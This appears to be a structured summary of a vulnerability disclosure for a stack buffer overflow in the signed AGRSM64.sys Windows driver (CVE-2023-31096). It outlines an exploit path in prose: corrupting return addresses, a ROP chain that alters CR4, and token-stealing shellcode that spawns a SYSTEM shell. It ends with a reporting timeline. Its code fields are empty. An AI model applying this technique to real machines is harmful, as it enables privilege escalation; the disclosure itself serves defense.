Vulnerability Details -.title: Kernel driver bug-hunting: Exploiting a Stack-Based Buffer Overflow -.description: The post discusses the exploitation of a stack-based buffer overflow in the AGRSM64.sys driver. -.ioctl_code: 0x1b2150 (CVE-2023-31096) -.driver_signature: The driver is signed by Microsoft and trusted on any Windows version. Exploitation -.method: The exploit involves: -.stack_overflow: Overflowing the stack to corrupt return addresses. -.rop_chain: Building a Return-Oriented Programming (ROP) chain to manipulate CR4 and execute shellcode. -.shellcode: Stealing tokens and spawning a SYSTEM shell. Key Code Snippets -.signed_verification: -.exploit_code_64: Timeline -.timeline: -.reported: 01/24/23 - Vulnerability reported to Broadcom. -.triage: 01/24/23 - Immediate triage response. -.advisory_release: 10/09/23 - Advisory release and blog post.